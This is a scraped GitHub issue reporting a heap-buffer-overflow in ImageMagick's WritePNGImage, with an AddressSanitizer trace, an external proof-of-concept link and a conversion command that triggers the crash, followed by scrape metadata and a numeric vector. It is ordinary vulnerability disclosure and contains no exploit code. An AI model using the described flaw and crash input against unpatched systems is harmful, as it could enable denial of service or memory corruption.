` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==41625==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: `Version: ImageMagick 7.0.8-43 Q16 x86_64 2019-04-29 https://imagemagick.org` `Copyright: ? 1999-2019 ImageMagick Studio LLC` `License: https://imagemagick.org/script/license.php` `Features: Cipher DPC HDRI OpenMP(4.0) ` `Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib` - Environment (Operating system, version and so on): `Distributor ID: Ubuntu` `Description: Ubuntu 16.04.1 LTS` `Release: 16.04` `Codename: xenial` - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in WritePNGImage of png.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1561/comments
3
2019-04-29T02:55:44
2019-12-26T12:39:58Z
https://github.com/ImageMagick/ImageMagick/issues/1561
438,133,289
1,561
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heap-buffer-overflow in WritePNGImage of png.c Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [X] I have verified that I am using the latest version of ImageMagick - [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow vulnerability in function WritePNGImage of png.c. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=11dbKOgAj3s8BPTO4P4Xescp2-2HlQUBP) magick convert $poc ./test.png `=================================================================` `==41625==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b251 at pc 0x7f57acd61145 bp 0x7fff0c9e88f0 sp 0x7fff0c9e8098` `READ of size 1 at 0x60200000b251 thread T0` ` #0 0x7f57acd61144 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x4b144)` ` #1 0x435b4e in LocaleNCompare MagickCore/locale.c:1581` ` #2 0x76bab9 in Magick_png_write_raw_profile coders/png.c:8183` ` #3 0x77be6c in WriteOnePNGImage coders/png.c:11083` ` #4 0x783ffa in WritePNGImage coders/png.c:12744` ` #5 0x849036 in WriteImage MagickCore/constitute.c:1159` ` #6 0x849d5b in WriteImages MagickCore/constitute.c:1376` ` #7 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305` ` #8 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #9 0x4100a1 in MagickMain utilities/magick.c:149` ` #10 0x410282 in main utilities/magick.c:180` ` #11 0x7f57a860f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` ` #12 0x40fbb8 in _start (/home/ImageMagick/utilities/magick+0x40fbb8)` `` `0x60200000b251 is located 0 bytes to the right of 1-byte region [0x60200000b250,0x60200000b251)` `allocated by thread T0 here:` ` #0 0x7f57acdae602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)` ` #1 0x44096a in AcquireMagickMemory MagickCore/memory.c:478` ` #2 0x4409be in AcquireQuantumMemory MagickCore/memory.c:551` ` #3 0x4c4165 in ConstantString MagickCore/string.c:713` ` #4 0x49a6fb in CloneSplayTree MagickCore/splay-tree.c:372` ` #5 0x487eab in CloneImageProfiles MagickCore/profile.c:190` ` #6 0x418926 in CloneImage MagickCore/image.c:838` ` #7 0x76d056 in WriteOnePNGImage coders/png.c:8528` ` #8 0x783ffa in WritePNGImage coders/png.c:12744` ` #9 0x849036 in WriteImage MagickCore/constitute.c:1159` ` #10 0x849d5b in WriteImages MagickCore/constitute.c:1376` ` #11 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305` ` #12 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #13 0x4100a1 in MagickMain utilities/magick.c:149` ` #14 0x410282 in main utilities/magick.c:180` ` #15 0x7f57a860f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` `` `SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??` `Shadow bytes around the buggy address:` ` 0x0c047fff95f0: fa fa 07 fa fa fa 00 01 fa fa 00 fa fa fa 04 fa` ` 0x0c047fff9600: fa fa 00 03 fa fa 00 fa fa fa 00 02 fa fa 06 fa` ` 0x0c047fff9610: fa fa 00 05 fa fa 05 fa fa fa 00 fa fa fa 01 fa` ` 0x0c047fff9620: fa fa 00 02 fa fa 00 04 fa fa 00 04 fa fa 00 04` ` 0x0c047fff9630: fa fa 03 fa fa fa 00 02 fa fa 07 fa fa fa 07 fa` `=>0x0c047fff9640: fa fa 00 01 fa fa 04 fa fa fa[01]fa fa fa 00 04` ` 0x0c047fff9650: fa fa 04 fa fa fa 04 fa fa fa 00 02 fa fa 06 fa` ` 0x0c047fff9660: fa fa 04 fa fa fa 00 02 fa fa 06 fa fa fa 04 fa` ` 0x0c047fff9670: fa fa 00 02 fa fa 06 fa fa fa 04 fa fa fa 00 02` ` 0x0c047fff9680: fa fa 06 fa fa fa 04 fa fa fa 00 02 fa fa 00 03` ` 0x0c047fff9690: fa fa 06 fa fa fa 04 fa fa fa 00 02 fa fa 05 fa` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` ` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==41625==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: `Version: ImageMagick 7.0.8-43 Q16 x86_64 2019-04-29 https://imagemagick.org` `Copyright: ? 1999-2019 ImageMagick Studio LLC` `License: https://imagemagick.org/script/license.php` `Features: Cipher DPC HDRI OpenMP(4.0) ` `Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib` - Environment (Operating system, version and so on): `Distributor ID: Ubuntu` `Description: Ubuntu 16.04.1 LTS` `Release: 16.04` `Codename: xenial` - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
5,576
[ -0.04124179854989052, 0.009390558116137981, -0.001499614561907947, -0.002617538208141923, 0.03194067254662514, 0.0244282279163599, -0.011964975856244564, 0.03700007498264313, -0.01995653286576271, 0.02522035501897335, 0.015267642214894295, -0.00214481633156538, 0.012067186646163464, 0.026421325281262398, -0.004107570741325617, -0.0014764575753360987, -0.02064645104110241, 0.015293193981051445, -0.023457231000065804, 0.01549761462956667, -0.0004030513809993863, -0.03940201550722122, -0.03439371660351753, 0.03505808487534523, -0.009122256189584732, 0.014756591059267521, -0.008221529424190521, 0.014232764020562172, 0.002980064833536744, 0.01851281337440014, 0.04027080163359642, 0.03038196824491024, 0.011530582793056965, 0.0244282279163599, 0.027724504470825195, 0.004768742714077234, 0.01754181832075119, 0.08938278257846832, -0.011006755754351616, 0.00905198697000742, -0.010623468086123466, -0.06275703758001328, 0.014334973879158497, 0.018397828564047813, -0.016992438584566116, 0.005819590762257576, -0.003762611420825124, -0.033320508897304535, -0.026370219886302948, 0.012744328938424587, 0.021770762279629707, -0.005647111218422651, -0.02031426876783371, -0.04213613644242287, -0.005647111218422651, -0.026957929134368896, 0.03127630800008774, 0.022013511508703232, 0.02971760183572769, 0.005391585640609264, -0.03178735822439194, 0.05687995254993439, 0.01533152349293232, 0.033499378710985184, -0.020454807206988335, -0.014347750693559647, -0.003638042602688074, 0.004113958682864904, -0.0062252371571958065, 0.009671635925769806, -0.011709450744092464, -0.026344668120145798, 0.028107792139053345, 0.03217064589262009, 0.0054714372381567955, 0.013121228665113449, 0.03694897145032883, 0.007001395802944899, -0.037741098552942276, 0.02226903662085533, -0.047732140868902206, 0.032630592584609985, -0.0518716536462307, 0.05077289417386055, 0.014360526576638222, 0.010891770012676716, -0.03459813818335533, -0.06725428253412247, -0.021706881001591682, -0.02565474808216095, 0.01833394728600979, 0.022895075380802155, 0.013606727123260498, -0.009978266432881355, 0.018448932096362114, 0.015178208239376545, -0.01488435361534357, -0.021221382543444633, -0.04487025737762451, 0.012143843807280064, -0.0026606579776853323, -0.0073335785418748856, -0.011421984992921352, 0.037971071898937225, -0.013504516333341599, -0.007697702385485172, -0.013402306474745274, -0.03482811152935028, 0.003983002156019211, 0.13174888491630554, 0.0024546408094465733, -0.01769513264298439, -0.021336369216442108, 0.020020414143800735, 0.025616420432925224, 0.01604699343442917, 0.0015850559575483203, -0.003015199676156044, -0.04504912719130516, -0.028363317251205444, -0.021476909518241882, -0.042979370802640915, -0.02059534564614296, 0.003593325847759843, -0.018908878788352013, 0.021374698728322983, -0.010304061695933342, -0.014181658625602722, -0.006726705934852362, -0.010802336037158966, -0.027315663173794746, -0.03562023863196373, 0.022460682317614555, -0.014833249151706696, -0.019381601363420486, -0.001641750568524003, -0.029129894450306892, 0.05082399770617485, 0.014411631971597672, 0.019202733412384987, -0.06316587328910828, -0.05928188934922218, 0.03058638796210289, 0.0010157134383916855, 0.0024354762863367796, 0.015395404770970345, -0.02496482990682125, -0.026242457330226898, -0.013261768035590649, -0.008841178379952908, -0.0033409944735467434, 0.0004515612672548741, 0.01939437724649906, -0.001437330269254744, 0.032221753150224686, -0.015804246068000793, 0.04088406264781952, 0.042621634900569916, 0.004008554387837648, -0.02041647769510746, -0.03117409721016884, -0.0491630844771862, 0.002564836060628295, -0.010751230642199516, 0.00026510757743380964, -0.037153393030166626, -0.015804246068000793, 0.007148322649300098, -0.013555621728301048, 0.022051841020584106, 0.007429400458931923, -0.0014053896302357316, 0.005193553399294615, -0.013185109943151474, -0.06822527945041656, 0.014679933898150921, -0.004541963804513216, 0.019266614690423012, -0.012067186646163464, -0.01998208463191986, -0.013747265562415123, -0.0017998568946495652, 0.004177839960902929, -0.0043439315631985664, 0.02203906513750553, -0.012163008563220501, 0.02331669069826603, -0.0009686009143479168, -0.0026590609923005104, 0.0007741620647720993, -0.005940965376794338, -0.03140407055616379, 0.0027468979824334383, -0.03628460317850113, 0.053711436688899994, -0.0050338502041995525, -0.017886776477098465, -0.04037301242351532, 0.024159925058484077, -0.014501065947115421, -0.0016153996111825109, -0.028721053153276443, -0.04103737697005272, -0.002670240355655551, -0.02077421359717846, 0.021757986396551132, -0.024198254570364952, 0.027903372421860695, 0.028797710314393044, -0.02948763035237789, -0.02295895665884018, -0.033448271453380585, 0.02113194949924946, 0.01766958087682724, -0.028210002928972244, 0.0020026802085340023, -0.02359776943922043, -0.0027005840092897415, -0.037996623665094376, 0.01818063110113144, -0.0005837157950736582, 0.005356451030820608, -0.007825464941561222, -0.02198795974254608, -0.06832748651504517, -0.020148176699876785, -0.0005761298816651106, -0.0019467840902507305, -0.042698293924331665, 0.00925640668720007, 0.02105529233813286, -0.03513474017381668, 0.006273148115724325, -0.0005857120850123465, 0.0034080699551850557, -0.014513841830193996, 0.013670608401298523, 0.009620530530810356, -0.0249392781406641, 0.032605040818452835, 0.01967545412480831, -0.0031940673943609, -0.000555368431378156, -0.010617080144584179, 0.023559439927339554, 0.04581570252776146, -0.03950422629714012, -0.026319114491343498, -0.01000381913036108, 0.009409721940755844, -0.02437712252140045, 0.006963066756725311, 0.006458404008299112, 0.014347750693559647, -0.00420019868761301, 0.0044046188704669476, 0.02352111227810383, -0.005902636330574751, -0.00491247558966279, -0.008170424029231071, 0.010795947164297104, 0.011824437417089939, -0.004513217136263847, 0.011345326900482178, 0.012424921616911888, -0.002344445325434208, -0.027826715260744095, 0.00042640799074433744, -0.011370879597961903, -0.01700521446764469, 0.027750056236982346, -0.0057205744087696075, -0.008738968521356583, -0.03702562674880028, -0.023099495097994804, -0.0003389703924767673, 0.013990014791488647, -0.004749577958136797, 0.022128498181700706, 0.0037019241135567427, 0.009448051452636719, 0.00038169106119312346, -0.032605040818452835, 0.020659226924180984, 0.010821499861776829, -0.020914752036333084, 0.016545269638299942, 0.008215141482651234, -0.038124386221170425, 0.010329613462090492, -0.0029976321384310722, 0.015906454995274544, -0.009818563237786293, -0.014462737366557121, 0.028261108323931694, 0.023853294551372528, -0.025718629360198975, 0.004104376304894686, -0.013121228665113449, 0.001641750568524003, -0.024849843233823776, -0.010035759769380093, -0.010022982954978943, 0.022358471527695656, 0.004442947451025248, 0.0012983883498236537, -0.03372935205698013, 0.024402674287557602, -0.000290859752567485, -0.016532491892576218, 0.032656144350767136, -0.010930098593235016, 0.005960129667073488, -0.02044203132390976, -0.05447801202535629, -0.007423012517392635, 0.00394147913902998, 0.02329113893210888, -0.004267273936420679, -0.0042800502851605415, -0.026727955788373947, 0.011153683066368103, -0.017963435500860214, 0.02542477659881115, 0.026216905564069748, 0.00986327975988388, -0.025820840150117874, 0.028388870880007744, -0.09342008084058762, 0.024466555565595627, -0.0024242971558123827, -0.03188956901431084, -0.009173361584544182, -0.047936562448740005, 0.016903003677725792, -0.0507473424077034, -0.033524930477142334, 0.027315663173794746, 0.015625378116965294, 0.02349555864930153, -0.014641604386270046, -0.010457376018166542, 0.0009749890305101871, -0.03664233908057213, 0.020608123391866684, -0.02626800909638405, -0.0006959073944017291, -0.027136795222759247, 0.01519098412245512, -0.002451446605846286, 0.000905518070794642, 0.06699875742197037, -0.0059760999865829945, 0.04568793997168541, 0.012412145733833313, -0.002590388525277376, -0.00028566940454766154, 0.004066047724336386, 0.012693223543465137, -0.04024524986743927, 0.00006038783612893894, -0.03061194159090519, -0.01818063110113144, -0.020480358973145485, 0.0245048850774765, 0.009569426067173481, 0.016749689355492592, -0.002459431765601039, 0.0013159557711333036, -0.0021895330864936113, -0.058310892432928085, 0.049367506057024, -0.043490421026945114, 0.015880903229117393, -0.0245815422385931, -0.033013880252838135, 0.00445572379976511, 0.010572362691164017, -0.053149279206991196, 0.013108452782034874, 0.007231368683278561, 0.03163404390215874, 0.0504407100379467, -0.04476804658770561, 0.029232103377580643, 0.018934430554509163, -0.0011746182572096586, 0.018270066007971764, 0.02455599047243595, -0.02306116558611393, -0.04006638005375862, 0.023648874834179878, 0.007046112325042486, -0.05437580123543739, -0.000299244187772274, 0.06490344554185867, 0.0061869085766375065, -0.02074866183102131, 0.033320508897304535, -0.03160849213600159, 0.012744328938424587, -0.017682356759905815, 0.014309422113001347, 0.02090197615325451, 0.018014539033174515, 0.02608914114534855, 0.024134373292326927, -0.012744328938424587, 0.03615684062242508, -0.027852267026901245, 0.02496482990682125, 0.016941333189606667, -0.04668448865413666, -0.005382003262639046, 0.014130554161965847, 0.009601366706192493, 0.0003108226810581982, 0.0006416082615032792, -0.0022837582509964705, 0.028772158548235893, -0.0254758819937706, -0.01135171577334404, 0.011722227558493614, 0.03398487716913223, -0.005774873774498701, 0.021476909518241882, -0.0016345640178769827, 0.021374698728322983, 0.026076365262269974, 0.0007534006144851446, -0.02178354002535343, -0.033294957131147385, -0.003612490138038993, 0.0036572071257978678, -0.02324003353714943, -0.037792205810546875, -0.037919968366622925, -0.03651457652449608, -0.01542095746845007, -0.009115868248045444, -0.017426831647753716, 0.01820618472993374, -0.013977238908410072, -0.04172729700803757, -0.010597915388643742, -0.037843309342861176, -0.013900580815970898, 0.001544331549666822, -0.00441739521920681, -0.027264559641480446, -0.010936486534774303, 0.032783906906843185, 0.002801197115331888, -0.03125075623393059, 0.019189955666661263, 0.010840664617717266, -0.05718658119440079, -0.016289742663502693, 0.02198795974254608, 0.012501579709351063, 0.011715838685631752, 0.0040884059853851795, -0.03513474017381668, -0.021298041567206383, 0.014488289132714272, 0.01554872002452612, 0.0251181460916996, 0.0036987299099564552, 0.019292166456580162, -0.02349555864930153, 0.029129894450306892, 0.04533020406961441, 0.026165800169110298, -0.01051486935466528, -0.007819077000021935, 0.02033982053399086, 0.023610545322299004, -0.012233277782797813, 0.021860197186470032, -0.04939305782318115, 0.015395404770970345, -0.04939305782318115, -0.04119069129228592, -0.01602144166827202, 0.03991306573152542, 0.007384683471173048, -0.013300096616148949, 0.012514355592429638, -0.02583361603319645, 0.026779061183333397, 0.0256291963160038, 0.00775519572198391, -0.00930751208215952, -0.028618844226002693, -0.0019387989304959774, 0.006295506842434406, -0.01715853065252304, -0.019151628017425537, 0.05442690849304199, -0.005758903454989195, 0.008457890711724758, -0.009275571443140507, 0.019994862377643585, -0.0007526021217927337, 0.013376753777265549, -0.048473164439201355, -0.020838094875216484, -0.0061869085766375065, -0.02971760183572769, -0.018921654671430588, 0.01177333202213049, -0.005065790843218565, 0.01126228179782629, -0.03388266637921333, 0.009607754647731781, -0.029155446216464043, 0.053864751011133194, -0.006567002274096012, 0.018844997510313988, 0.013721712864935398, -0.009927161037921906, -0.0012664477108046412, 0.003210037713870406, 0.03125075623393059, 0.02504148706793785, 0.012284383177757263, 0.0247604101896286, 0.002681419486179948, 0.02270343154668808, -0.02619135193526745, 0.009275571443140507, 0.0007146725547499955, -0.019688231870532036, 0.01810397394001484, 0.014117777347564697, 0.008502607233822346, -0.01568925939500332, -0.015433733351528645, -0.005455466918647289, -0.01155613549053669, -0.009339452721178532, 0.04425699636340141, -0.04218723997473717, -0.012520743533968925, -0.024198254570364952, 0.02067200466990471, -0.021975183859467506, 0.015599824488162994, -0.004248109646141529, -0.018244512379169464, 0.016788017004728317, -0.010010207071900368, 0.014449960552155972, 0.013134004548192024, 0.00004132324465899728, 0.016008665785193443, -0.004094794392585754, -0.012444086372852325, 0.03574800118803978, 0.0034080699551850557, 0.0022917434107512236, 0.012073574587702751, 0.017784567549824715, 0.0003122200723737478, 0.0020809348206967115, -0.024900948628783226, 0.008898671716451645, 0.01975211314857006, -0.03119964897632599, -0.016660254448652267, 0.032119542360305786, 0.019918203353881836, 0.012079962529242039, -0.006630884017795324, 0.0017774985171854496, 0.016992438584566116, -0.006493539083749056, -0.0010612289188429713, -0.019100522622466087, -0.005442690569907427, -0.01250796765089035, -0.0030758867505937815, -0.008560100570321083, 0.016034217551350594, 0.03697452321648598, -0.02278008870780468, 0.014360526576638222, 0.013363977894186974, -0.013964462094008923, -0.018793892115354538, 0.008304575458168983, 0.0013470979174599051, -0.013427859172224998, 0.007148322649300098, 0.003085469128564, -0.012118291109800339, 0.017835672944784164, -0.01789955422282219, -0.007416624575853348, -0.00783185288310051, -0.04124179854989052, 0.03360158950090408, 0.01225244253873825, -0.028618844226002693, -0.009524708613753319, 0.00008609009819338098, 0.020889200270175934, -0.015880903229117393, 0.002052188152447343, 0.022716207429766655, 0.016724135726690292, 0.03107188642024994, 0.023929951712489128, 0.011849990114569664, 0.02961539290845394, -0.009626919403672218, 0.007761583663523197, 0.02303561381995678, -0.042877160012722015, 0.011358103714883327, 0.01993098109960556, -0.06418797373771667, 0.01718408241868019, -0.00019483811047393829, 0.013389530591666698, 0.012105515226721764, -0.0248626209795475, -0.012175784446299076, -0.011051473207771778, -0.021642999723553658, -0.01554872002452612, 0.04648006707429886, 0.0487542450428009, -0.01843615621328354, -0.019560469314455986, 0.01746515929698944, 0.026779061183333397, -0.004458918236196041, -0.03876320272684097, -0.010163522325456142, -0.0002896619844250381, 0.002698986791074276, -0.00921807810664177, 0.019126074388623238, -0.02120860666036606, -0.008809237740933895, 0.002732524648308754, 0.010246568359434605, 0.005867501720786095, 0.02964094467461109, -0.06137719750404358, -0.002927362686023116, 0.011562523432075977, 0.014999340288341045, 0.00045116202090866864, 0.018755562603473663, 0.0513094961643219, 0.04671004042029381, -0.021553566679358482, -0.02267787791788578, -0.011485866270959377, -0.010923710651695728, -0.03079080954194069, 0.03360158950090408, 0.03605463355779648, -0.009313900023698807, -0.03735781088471413, -0.038047730922698975, 0.0505940280854702, 0.013568397611379623, 0.018423380330204964, 0.0026558670215308666, -0.020199282094836235, 0.011849990114569664, -0.011613628827035427, -0.019138852134346962, 0.032426171004772186, 0.022332919761538506, -0.02992202341556549, 0.03084191493690014, 0.03150628134608269, -0.01962435059249401, -0.0027532861568033695, -0.0028618844226002693, -0.03669344633817673, 0.007876570336520672, 0.013670608401298523, 0.003283501137048006, -0.016609150916337967, -0.03462368994951248, 0.038047730922698975, -0.015855349600315094, 0.011204788461327553, 0.014283869415521622, 0.02455599047243595, 0.0019627544097602367, -0.003334606299176812, -0.00324836652725935, -0.01685190014541149, -0.0076465969905257225, -0.03587576374411583, 0.013581174425780773, 0.00036931404611095786, 0.027571190148591995, 0.008106542751193047, 0.028465528041124344, -0.010048535652458668, 0.002936944831162691, -0.011575300246477127, -0.008240694180130959, -0.011236729100346565, 0.008700639009475708, -0.03523695096373558, 0.013287319801747799, 0.0056822458282113075, -0.005337286740541458, 0.007978780195116997, -0.006739482283592224, 0.006598942913115025, 0.002048994181677699, -0.010048535652458668, -0.021310817450284958, -0.033499378710985184, -0.052331600338220596, 0.000780949485488236, 0.006174132227897644, -0.006892797537147999, -0.003973419778048992, 0.01531874667853117, 0.012884867377579212, 0.011824437417089939, -0.03020310029387474, -0.012667670845985413, -0.0024769993033260107, -0.010629856027662754, 0.005758903454989195, 0.012079962529242039, -0.010559586808085442, 0.019918203353881836, -0.00430879695340991, 0.018883327022194862, -0.0254503283649683, 0.011364491656422615, -0.04438475891947746, 0.018270066007971764, -0.010859829373657703, 0.017656804993748665, 0.026830166578292847, -0.04456362873315811, 0.032528381794691086, -0.005979293957352638, 0.007621044758707285, -0.004085212014615536, -0.03544137254357338, -0.023252809420228004, 0.0014724649954587221, -0.006848080549389124, -0.008317351341247559, 0.005493795964866877, -0.027290111407637596, 0.007033336441963911, -0.00189887301530689, -0.010463764891028404, 0.001491629402153194, -0.0017168112099170685, 0.0005409951554611325, 0.03053528442978859, -0.028465528041124344, 0.014296645298600197, -0.00772325461730361, 0.00750605808570981, -0.00008594037353759632, -0.016353623941540718, 0.00388718000613153, 0.03536471351981163, -0.03906983137130737, 0.008534547872841358, 0.018666129559278488, 0.01851281337440014, 0.03370380029082298, -0.03518584743142128, 0.014232764020562172, -0.04205947741866112, 0.05406917259097099, -0.005276599433273077, -0.01013158168643713, 0.0005565662286244333, -0.0009254810283891857, -0.029129894450306892, -0.0025696272496134043, -0.007953227497637272, -0.006234819535166025, 0.04573904350399971, -0.00843872595578432, -0.009799398481845856, -0.008394008502364159, 0.00379774603061378, -0.010610691271722317, 0.011588076129555702, -0.032707247883081436, -0.004149093292653561, 0.00502107385545969, -0.021936854347586632, -0.02046758309006691, -0.03084191493690014, -0.013159557245671749, -0.010719290003180504, 0.03735781088471413, -0.03079080954194069, 0.02994757518172264, 0.005580035503953695, -0.02221793308854103, 0.0016529298154637218, 0.01531874667853117, -0.023993832990527153, -0.04073074832558632, 0.01000381913036108, -0.03602907806634903, -0.01787400059401989, -0.008956165052950382, -0.031148545444011688, -0.004813459701836109, -0.014475513249635696, -0.04466583952307701, -0.02198795974254608, -0.010195462964475155, -0.0007530013681389391, 0.014130554161965847, -0.013619503006339073, 0.016736913472414017, -0.014641604386270046, -0.03076525591313839, 0.004369484260678291, 0.02971760183572769, -0.014948234893381596, 0.006720317527651787, 0.0014988160692155361, -0.018142301589250565, -0.020301492884755135, 0.02298450842499733, -0.0038169105537235737, 0.01576591655611992, -0.005810008384287357, -0.019688231870532036, 0.005902636330574751, -0.03464924171566963, -0.024492109194397926, 0.009524708613753319, 0.004733607638627291, -0.008445113897323608, 0.0037115062586963177, 0.009275571443140507, -0.019611572846770287, 0.019534915685653687, 0.0009334661881439388, -0.00775519572198391, -0.009390558116137981, -0.017120201140642166, 0.011639181524515152, -0.0006839296547695994, 0.011453925631940365, 0.009173361584544182, -0.011038696393370628, 0.012610177509486675, 0.033550482243299484, 0.003539026714861393, -0.016481388360261917, -0.003254754701629281, 0.006669212598353624, -0.026319114491343498, -0.004254497587680817, -0.004762354306876659, 0.04888200759887695, 0.0017327815294265747, -0.03171069920063019, -0.012086350470781326, 0.005947353318333626, -0.017503488808870316, 0.024798739701509476, 0.03127630800008774, -0.02105529233813286, -0.011013144627213478, 0.008029885590076447, 0.010144357569515705, 0.0064743743278086185, -0.048473164439201355, 0.008106542751193047, -0.017733462154865265, -0.013517293147742748, 0.01043821219354868, 0.008272634819149971, 0.003912732470780611, -0.033652693033218384, -0.020582569763064384, 0.027290111407637596, 0.03482811152935028, -0.010783171281218529, -0.012795433402061462, -0.014296645298600197, -0.010195462964475155, 0.003443204564973712, 0.005362838972359896, 0.018704459071159363, 0.014053896069526672, -0.004075630102306604, 0.0076465969905257225, 0.02593582682311535, -0.006943902466446161, -0.01861502416431904, 0.013248991221189499, 0.012163008563220501, -0.018972760066390038, 0.004161869641393423, -0.021234160289168358, -0.009939937852323055, 0.018065644428133965, -0.016430282965302467, 0.02010984718799591, 0.018448932096362114, 0.014501065947115421, 0.011185623705387115, -0.015178208239376545, -0.003986196126788855, 0.026127470657229424, -0.0024258941411972046, -0.032656144350767136, -0.037408918142318726, 0.010284896939992905, -0.0008192782988771796, 0.006289118435233831, 0.00383288087323308, 0.011019532568752766, -0.0005537714459933341, 0.005669469479471445, 0.014769366942346096, -0.01022101566195488, -0.01622586138546467, 0.011006755754351616, -0.04604567587375641, -0.032375067472457886, 0.016034217551350594, -0.017196858301758766, 0.020224833860993385, 0.00008783685188973323, 0.011236729100346565, 0.00977384578436613, 0.014105001464486122, -0.013287319801747799, -0.023610545322299004, -0.013453411869704723, -0.02313782460987568, -0.009026434272527695, 0.007780747953802347, -0.01566370576620102, 0.004522799514234066, 0.01769513264298439, -0.024415450170636177, 0.005512960255146027, 0.006164549849927425, 0.0028427198994904757, 0.020505912601947784, 0.014245539903640747, -0.03038196824491024, -0.013849476352334023, 0.0026063588447868824, 0.009198914282023907, -0.03906983137130737, 0.006918349768966436, -0.02372553199529648, -0.018666129559278488, -0.00035953219048678875, 0.022332919761538506, 0.002029829891398549, 0.04093516618013382, 0.00035314407432451844, 0.02992202341556549, -0.02306116558611393, -0.03633571043610573, -0.014219988137483597, 0.006841692142188549, 0.002975273644551635, -0.0064264633692801, 0.043515972793102264, -0.021796315908432007, 0.0009151002741418779, -0.026932375505566597, 0.015804246068000793, 0.018193406984210014, -0.018857773393392563, -0.012846538797020912, 0.013926133513450623, 0.010891770012676716, 0.006592554971575737, -0.03204288333654404, 0.0048422059044241905, 0.007851017639040947, -0.026127470657229424, -0.021246936172246933, -0.0039446731097996235, -0.026472430676221848, -0.028158897534012794, 0.025028711184859276, 0.017017990350723267, 0.014769366942346096, -0.00044916573096998036, 0.022562891244888306, 0.006170938257128, -0.006004846654832363, -0.009473604150116444, -0.005794038064777851, -0.017886776477098465, 0.01784844882786274, 0.032911669462919235, -0.025233132764697075, 0.0258847214281559, -0.014794919639825821, 0.005353257060050964, 0.006796975154429674, -0.0070844413712620735, 0.03163404390215874, -0.032707247883081436, 0.009907997213304043, -0.008419561199843884, -0.028158897534012794, 0.00014892338367644697, 0.007454953156411648, -0.009409721940755844, -0.004586680792272091, -0.0023045195266604424, 0.01802731677889824, -0.006822527851909399, -0.00036851552431471646, 0.01828284189105034, -0.006503120996057987, -0.013325649313628674, 0.005637528840452433, 0.03168514743447304, -0.02265232615172863, -0.032375067472457886, 0.011345326900482178, 0.038431018590927124, -0.018346723169088364, -0.03388266637921333, -0.004957192577421665, -0.010240179486572742, 0.02191130258142948, 0.0033122478052973747, -0.015727587044239044, 0.0025344924069941044, -0.024134373292326927, 0.01164556946605444, -0.019419929012656212, 0.03217064589262009, -0.029257657006382942, -0.03876320272684097, -0.006202878896147013, 0.014948234893381596, -0.007742419373244047, 0.00032479671062901616, -0.005794038064777851, 0.0018701264634728432, 0.003673177445307374, 0.0022773700766265392, -0.047527723014354706, -0.02524590864777565, -0.032630592584609985, -0.012616566382348537, 0.024517660960555077, 0.005924995057284832, -0.011933035217225552, 0.029053237289190292, -0.0002213887928519398, -0.01151780690997839, -0.0259613785892725, 0.01700521446764469, -0.01604699343442917, 0.013389530591666698, -0.005599200259894133, -0.014756591059267521, -0.006087892223149538, -0.017145752906799316, 0.0014780546771362424, -0.007991556078195572, -0.00925640668720007, -0.04139511287212372, 0.013926133513450623, 0.009135033003985882, -0.008055438287556171, 0.00804904941469431, 0.014539394527673721, -0.009416110813617706, -0.00995271373540163, -0.001924425596371293, -0.02113194949924946, 0.0007290458888746798, 0.016941333189606667, 0.01939437724649906, 0.06526118516921997, -0.033218301832675934, -0.012348264455795288, -0.023406125605106354, 0.009907997213304043, 0.006439239718019962, -0.012092739343643188, 0.005707798525691032, -0.00421936297789216, -0.007902123034000397, 0.006765034515410662, -0.01597033627331257, 0.01604699343442917, 0.03467479348182678, 0.003973419778048992, 0.00795961543917656, -0.0050721787847578526, -0.006841692142188549, 0.020454807206988335, -0.009575814008712769, 0.0001735776022542268, -0.013478964567184448, -0.0065797786228358746, -0.021361922845244408, 0.026370219886302948, -0.03206843510270119, -0.0259869322180748, -0.01130061037838459, -0.033192746341228485, -0.020505912601947784, -0.007978780195116997, -0.01022101566195488, -0.021310817450284958, 0.01022101566195488, 0.005730156786739826, -0.016775241121649742, 0.014002791605889797, -0.016034217551350594, -0.014130554161965847, 0.0006819333648309112, -0.0027980029117316008, -0.028107792139053345, 0.0013966059777885675, 0.001667303149588406, 0.0018397828098386526, -0.015037668868899345, 0.013875028118491173, -0.008253470063209534, -0.0017806924879550934, 0.017554594203829765, 0.009384170174598694, -0.015165431424975395, 0.01987987570464611, 0.0014413228491321206, 0.011370879597961903, 0.03155738487839699, -0.002298131352290511, 